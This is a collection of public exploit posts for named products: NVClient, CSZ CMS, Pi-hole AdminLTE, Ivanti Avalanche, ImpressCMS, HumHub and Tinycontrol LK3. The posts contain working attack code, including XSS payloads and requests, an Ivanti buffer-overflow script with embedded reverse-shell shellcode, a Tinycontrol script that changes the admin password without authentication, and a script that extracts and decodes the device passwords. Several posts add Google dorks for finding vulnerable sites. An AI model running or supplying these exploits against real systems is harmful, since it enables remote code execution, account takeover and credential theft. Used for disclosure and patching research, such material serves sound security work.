<pre><code># Exploit Title: NVClient v5.0 - Stack Buffer Overflow (DoS)<br /># Discovered by: Ahmet Ümit BAYRAM<br /># Discovered Date: 2023-08-19<br /># Software Link: http://www.neonguvenlik.com/yuklemeler/yazilim/kst-f919-hd2004.rar<br /># Software Manual: http://download.eyemaxdvr.com/DVST%20ST%20SERIES/CMS/Video%20Surveillance%20Management%20Software(V5.0).pdf<br /># Vulnerability Type: Buffer Overflow Local<br /># Tested On: Windows 10 64bit<br /># Tested Version: 5.0<br /><br /><br /># Steps to Reproduce:<br /># 1- Run the python script and create exploit.txt file<br /># 2- Open the application and log in<br /># 3- Click the "Config" button in the upper menu<br /># 4- Click the "User" button just below it<br /># 5- Now click the "Add users" button in the lower left<br /># 6- Fill in the Username, Password, and Confirm boxes<br /># 7- Paste the characters from exploit.txt into the Contact box<br /># 8- Click OK and crash!<br /><br />#!/usr/bin/env python3<br /><br />exploit = 'A' * 846<br /><br />try:<br /> with open("exploit.txt","w") as file:<br /> file.write(exploit)<br /> print("POC is created")<br />except:<br /> print("POC not created")<br /><br /><br /></code></pre>
<pre><code># Exploit Title: CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin 'Gallery')<br /># Date: 2023/08/18<br /># CVE: CVE-2023-38911<br /># Exploit Author: Daniel González<br /># Vendor Homepage: https://www.cszcms.com/<br /># Software Link: https://github.com/cskaza/cszcms<br /># Version: 1.3.0<br /># Tested on: CSZ CMS 1.3.0<br /># Description:<br /># CSZ CMS 1.3.0 is affected by a cross-site scripting (XSS) feature that allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered in the 'Gallery' section and choosing our Gallery. previously created, in the 'YouTube URL' field, this input is affected by an XSS. It should be noted that previously when creating a gallery the "Name" field was vulnerable to XSS, but this was resolved in the current version 1.3.0, the vulnerability found affects the "YouTube URL" field within the created gallery.<br /><br /># Steps to reproduce Stored XSS:<br /><br />Go to url http://localhost/admin/plugin/gallery/edit/2.<br /><br />When logging into the panel, we will go to the "Gallery" section and create a Carousel [http://localhost/admin/plugin/gallery], the vulnerable field is located at [http://localhost/admin/plugin/gallery/edit/2]<br />We edit that Gallery that we have created and see that we can inject arbitrary web scripts or HTML into the “Youtube URL”fields.<br /><br />With the following payload we can achieve the XSS<br /><br />Payload:<br /><br /><div><p title="</div><svg/onload=alert(document.domain)>"><br /><br /><br />#PoC Request:<br /><br />POST http://localhost:8080/admin/plugin/gallery/addYoutube/2 HTTP/1.1<br />Host: localhost:8080<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/116.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 140<br />Origin: http://localhost:8080<br />Referer: http://localhost:8080/admin/plugin/gallery/edit/2<br />Upgrade-Insecure-Requests: 1<br /><br />gallery_type=youtubevideos&youtube_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E&submit=Add<br /><br /><br /># Exploit Title: CSZ CMS 1.3.0 - Stored Cross-Site Scripting ('Photo URL' and 'YouTube URL' )<br /># Date: 2023/08/18<br /># CVE: CVE-2023-38910<br /># Exploit Author: Daniel González<br /># Vendor Homepage: https://www.cszcms.com/<br /># Software Link: https://github.com/cskaza/cszcms<br /># Version: 1.3.0<br /># Tested on: CSZ CMS 1.3.0<br /># Description:<br /># CSZ CMS 1.3.0 is vulnerable to cross-site scripting (XSS), which allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered in the 'Carousel Wiget' section and choosing our carousel widget created above, in 'Photo URL' and 'YouTube URL' plugin.<br /><br /># Steps to reproduce Stored XSS:<br /><br />Go to url http://localhost/admin/carousel.<br /><br />We edit that Carousel that we have created and see that we can inject arbitrary web scripts or HTML into the “Youtube URL” and “Photo URL” fields.<br />We can inject HTML code.<br /><br />With the following payload we can achieve the XSS.<br /><br />Payload:<br /><br /><div><p title="</div><svg/onload=alert(document.domain)>"><br /><br /><br />#PoC Request:<br /><br /><br />POST http://localhost:8080/admin/carousel/addUrl/3 HTTP/1.1<br />Host: localhost:8080<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/116.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 137<br />Origin: http://localhost:8080<br />Referer: http://localhost:8080/admin/carousel/edit/3<br />Upgrade-Insecure-Requests: 1<br /><br />carousel_type=multiimages&photo_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E&submit=Add<br /><br /></code></pre>
<pre><code># Exploit Title: AdminLTE PiHole < 5.18 - Broken Access Control<br /># Google Dork: [inurl:admin/scripts/pi-hole/phpqueryads.php](https://vuldb.com/?exploit_googlehack.216554)<br /># Date: 21.12.2022<br /># Exploit Author: kv1to<br /># Version: Pi-hole v5.14.2; FTL v5.19.2; Web Interface v5.17<br /># Tested on: Raspbian / Debian<br /># Vendor: https://github.com/pi-hole/AdminLTE/security/advisories/GHSA-6qh8-6rrj-7497<br /># CVE : CVE-2022-23513<br /><br />In case of an attack, the threat actor will obtain the ability to perform an unauthorized query for blocked domains on queryads endpoint.<br /><br />## Proof Of Concept with curl:<br />curl 'http://pi.hole/admin/scripts/pi-hole/php/queryads.php?domain=<searchquery>'<br /><br />## HTTP requests<br />GET /admin/scripts/pi-hole/php/queryads.php?domain=<searchquery>' HTTP/1.1<br />HOST: pi.hole<br />Cookie: [..SNIPPED..]<br />[..SNIPPED..]<br /><br />## HTTP Response<br />HTTP/1.1 200 OK<br />[..SNIPPED..]<br /><br />data: Match found in [..SNIPPED..]<br />data: <domain><br />data: <domain><br />data: <domain><br /></code></pre>
<pre><code>"""<br />Exploit Title: Ivanti Avalanche <v6.4.0.0 - Remote Code Execution<br />Date: 2023-08-16<br />Exploit Author: Robel Campbell (@RobelCampbell)<br />Vendor Homepage: https://www.ivanti.com/<br />Software Link: https://www.wavelink.com/download/Downloads.aspx?DownloadFile=27550&returnUrl=/Download-Avalanche_Mobile-Device-Management-Software/<br />Version: v6.4.0.0<br />Tested on: Windows 11 21H2<br />CVE: CVE-2023-32560<br />Reference: https://www.tenable.com/security/research/tra-2023-27<br />"""<br /><br />import socket<br />import struct<br />import sys<br /><br /># Create an item structure for the header and payload<br />class Item:<br /> def __init__(self, type_, name, value):<br /> self.type = type_<br /> self.name = name.encode()<br /> self.value = value<br /> self.name_size = 0x5<br /> self.value_size = 0x800<br /><br /> def pack(self):<br /> return struct.pack('>III{}s{}s'.format(self.name_size, self.value_size),<br /> self.type, self.name_size, self.value_size, self.name, self.value)<br /><br /># Create a header structure<br />class HP:<br /> def __init__(self, hdr, payload):<br /> self.hdr = hdr<br /> self.payload = payload<br /> self.pad = b'\x00' * (16 - (len(self.hdr) + len(self.payload)) % 16)<br /><br /> def pack(self):<br /> return b''.join([item.pack() for item in self.hdr]) + \<br /> b''.join([item.pack() for item in self.payload]) + self.pad<br /><br /># Create a preamble structure<br />class Preamble:<br /> def __init__(self, hp):<br /> self.msg_size = len(hp.pack()) + 16<br /> self.hdr_size = sum([len(item.pack()) for item in hp.hdr])<br /> self.payload_size = sum([len(item.pack()) for item in hp.payload])<br /> self.unk = 0 # Unknown value<br /><br /> def pack(self):<br /> return struct.pack('>IIII', self.msg_size, self.hdr_size, self.payload_size, self.unk)<br /><br /># Create a message structure<br />class Msg:<br /> def __init__(self, hp):<br /> self.pre = Preamble(hp)<br /> self.hdrpay = hp<br /><br /> def pack(self):<br /> return self.pre.pack() + self.hdrpay.pack()<br /><br /># msfvenom -p windows/shell_reverse_tcp LHOST=192.168.86.30 LPORT=4444 exitfunc=thread -f python<br />shellcode = b""<br />shellcode += b"fce8820000006089e531c064"<br />shellcode += b"8b50308b520c8b52148b7228"<br />shellcode += b"0fb74a2631ffac3c617c022c"<br />shellcode += b"20c1cf0d01c7e2f252578b52"<br />shellcode += b"108b4a3c8b4c1178e34801d1"<br />shellcode += b"518b592001d38b4918e33a49"<br />shellcode += b"8b348b01d631ffacc1cf0d01"<br />shellcode += b"c738e075f6037df83b7d2475"<br />shellcode += b"e4588b582401d3668b0c4b8b"<br />shellcode += b"581c01d38b048b01d0894424"<br />shellcode += b"245b5b61595a51ffe05f5f5a"<br />shellcode += b"8b12eb8d5d68333200006877"<br />shellcode += b"73325f54684c772607ffd5b8"<br />shellcode += b"9001000029c454506829806b"<br />shellcode += b"00ffd5505050504050405068"<br />shellcode += b"ea0fdfe0ffd5976a0568c0a8"<br />shellcode += b"561e680200115c89e66a1056"<br />shellcode += b"576899a57461ffd585c0740c"<br />shellcode += b"ff4e0875ec68f0b5a256ffd5"<br />shellcode += b"68636d640089e357575731f6"<br />shellcode += b"6a125956e2fd66c744243c01"<br />shellcode += b"018d442410c6004454505656"<br />shellcode += b"5646564e565653566879cc3f"<br />shellcode += b"86ffd589e04e5646ff306808"<br />shellcode += b"871d60ffd5bbe01d2a0a68a6"<br />shellcode += b"95bd9dffd53c067c0a80fbe0"<br />shellcode += b"7505bb4713726f6a0053ffd5"<br /><br />buf = b'90' * 340<br />buf += b'812b4100' # jmp esp (0x00412b81)<br />buf += b'90909090'<br />buf += b'90909090'<br />buf += shellcode<br />buf += b'41' * 80<br />buf += b'84d45200' # stack pivot: add esp, 0x00000FA0 ; retn 0x0004 ; (0x0052d484)<br />buf += b'43' * (0x800 - len(buf))<br /><br />buf2 = b'41' * 0x1000<br /><br /># Create message payload<br />hdr = [Item(3, "pwned", buf)]<br />payload = [Item(3, "pwned", buf2)] # dummy payload, probabaly not necessary<br />hp_instance = HP(hdr, payload)<br />msg_instance = Msg(hp_instance)<br /><br /># Default port<br />port = 1777<br /><br /># check for target host argument<br />if len(sys.argv) > 1:<br /> host = sys.argv[1]<br />else:<br /> print("Usage: python3 CVE-2023-32560.py <host ip>")<br /> sys.exit()<br /><br />with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:<br /> s.connect((host, port))<br /> s.sendall(msg_instance.pack())<br /> print("Message sent!")<br /> s.close()<br /> <br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : ImpressionTech CMS ٍv1.4 Sql injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit) |<br />| # Vendor : http://www.imprtech.com/ | <br />| # Dork : "Website | Impression Technologies LLC" .php?id= |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine <br /><br />[+] Use Payload : /news.php?id=58<br /><br />[+] http://127.0.0.1/xxxxxxxxxx.com/news.php?id=58 <======= inject here<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : impress CMS v1.3.9 Open Redirect vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : http://www.impresscms.org/ |<br />| # Dork : "Powered by ImpressCMS" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload :http://localhost/user.php?xoops_redirect="maliciouslink"<br /><br />[+] http://localhost/user.php?xoops_redirect=https://packetstormsecurity.com/<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : ImgHosting v1.3 html injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) | <br />| # Vendor : https://codecanyon.net/user/FoxSash/?ref=FoxSash | <br />| # Dork : "ImgHosting Programming by FoxSash" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Register new user http://www.127.0.0.1/sowrkom/?register<br /><br />[+] Login and upload image file go to yours file http://127.0.0.1/ikhostingcom/?files<br /><br />[+] and edit your image and add Description put this code Url redirect <META http-equiv="refresh" content="5;URL=https://cxsecurity.com/"><br /><br />[+] http://127.0.0.1/ikhostinom/DNSRBJh<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Humhub v1.3.13 Unrestricted File Upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 67.0(32-bit) |<br />| # Vendor : https://www.humhub.org/en/download/package/humhub-1.3.13.zip |<br />| # Dork : "Propulsé par HumHub" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Unauthorized file upload Allows any Registered members to upload malicious files and run them.<br /><br />[+] Register new user .<br /><br />[+] go to your profile https://127.0.0.1/humhub.com/u/admin/user/profile/home Get started and post something bad.<br /><br />[+] /uploads/file/yours.php<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>#!/bin/bash<br />: "<br /><br />Tinycontrol LAN Controller v3 (LK3) Remote Admin Password Change<br /><br /><br />Vendor: Tinycontrol<br />Product web page: https://www.tinycontrol.pl<br />Affected version: <=1.58a, HW 3.8<br /><br />Summary: Lan Controller is a very universal<br />device that allows you to connect many different<br />sensors and remotely view their readings and<br />remotely control various types of outputs.<br />It is also possible to combine both functions<br />into an automatic if -> this with a calendar<br />when -> then. The device provides a user interface<br />in the form of a web page. The website presents<br />readings of various types of sensors: temperature,<br />humidity, pressure, voltage, current. It also<br />allows you to configure the device, incl. event<br />setting and controlling up to 10 outputs. Thanks<br />to the support of many protocols, it is possible<br />to operate from smartphones, collect and observ<br />the results on the server, as well as cooperation<br />with other I/O systems based on TCP/IP and Modbus.<br /><br />Desc: The application suffers from an insecure access<br />control allowing an unauthenticated attacker to<br />change accounts passwords and bypass authentication<br />gaining panel control access.<br /><br />Tested on: lwIP<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5787<br />Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5787.php<br /><br /><br />18.08.2023<br /><br />"<br /><br />set -euo pipefail<br />IFS=$'\n\t'<br /><br />if [ $# -ne 2 ]; then<br /> echo -ne '\nUsage: $0 [ipaddr] [desired admin pwd]\n\n'<br /> exit<br />fi<br /><br />IP=$1<br />PW=$2<br /><br />EN=$(echo -n $PW | base64)<br /><br />curl -s http://$IP/stm.cgi?auth=00YWRtaW4=*$EN*dXNlcg==*dXNlcg==<br /># ?auth=00 (disable authentication, disable upgrade), https://docs.tinycontrol.pl/en/lk3/api/access/<br />echo -ne '\nAdmin password changed to: '$PW<br /></code></pre>
<pre><code>#!/usr/bin/env python<br />#<br />#<br /># Tinycontrol LAN Controller v3 (LK3) Remote Credentials Extraction PoC<br />#<br />#<br /># Vendor: Tinycontrol<br /># Product web page: https://www.tinycontrol.pl<br /># Affected version: <=1.58a, HW 3.8<br />#<br /># Summary: Lan Controller is a very universal<br /># device that allows you to connect many different<br /># sensors and remotely view their readings and<br /># remotely control various types of outputs.<br /># It is also possible to combine both functions<br /># into an automatic if -> this with a calendar<br /># when -> then. The device provides a user interface<br /># in the form of a web page. The website presents<br /># readings of various types of sensors: temperature,<br /># humidity, pressure, voltage, current. It also<br /># allows you to configure the device, incl. event<br /># setting and controlling up to 10 outputs. Thanks<br /># to the support of many protocols, it is possible<br /># to operate from smartphones, collect and observ<br /># the results on the server, as well as cooperation<br /># with other I/O systems based on TCP/IP and Modbus.<br />#<br /># Desc: An unauthenticated attacker can retrieve the<br /># controller's configuration backup file and extract<br /># sensitive information that can allow him/her/them<br /># to bypass security controls and penetrate the system<br /># in its entirety.<br />#<br /># Tested on: lwIP<br />#<br />#<br /># Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /># @zeroscience<br />#<br />#<br /># Advisory ID: ZSL-2023-5786<br /># Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5786.php<br />#<br />#<br /># 18.08.2023<br />#<br />#<br /><br /><br />import subprocess<br />import requests<br />import base64<br />import sys<br /><br />binb = "lk3_settings.bin"<br />outf = "lk3_settings.enc"<br />bpatt = "0upassword"<br />epatt = "pool.ntp.org"<br />startf = False<br />endf = False<br />extral = []<br /><br />print("""<br /> O`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'O<br /> | |<br /> | Tinycontrol LK3 1.58 Settings DL |<br /> | ZSL-2023-5786 |<br /> | 2023 (c) Zero Science Lab |<br /> | |<br /> |`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'|<br /> | |<br />""")<br /><br />if len(sys.argv) != 2:<br /> print("[?] Vaka: python {} ipaddr:port".format(sys.argv[0]))<br /> exit(-0)<br />else:<br /> rhost=sys.argv[1]<br /> if not "http" in rhost:<br /> rhost="http://{}".format(rhost)<br /><br />try:<br /> resp = requests.get(rhost + "/" + binb)<br /> if resp.status_code == 200:<br /> with open(outf, 'wb') as f:<br /> f.write(resp.content)<br /> print(f"[*] Got data as {outf}")<br /> else:<br /> print(f"[!] Backup failed. Status code: {resp.status_code}")<br />except Exception as e:<br /> print("[!] Error:", str(e))<br /> exit(-1)<br /><br />binf = outf<br />sout = subprocess.check_output(["strings", binf], universal_newlines = True)<br />linea = sout.split("\n")<br /><br />for thricer in linea:<br /> if bpatt in thricer:<br /> startf = True<br /> elif epatt in thricer:<br /> endf = True<br /> elif startf and not endf:<br /> extral.append(thricer)<br /><br />if len(extral) >= 4:<br /> userl = extral[1].strip()<br /> adminl = extral[3].strip()<br /> try:<br /> decuser = base64.b64decode(userl).decode("utf-8")<br /> decadmin = base64.b64decode(adminl).decode("utf-8")<br /> print("[+] User password:", decuser)<br /> print("[+] Admin password:", decadmin)<br /> except Exception as e:<br /> print("[!] Error decoding:", str(e))<br />else:<br /> print("[!] Regex failed.")<br /> exit(-2)<br /></code></pre>
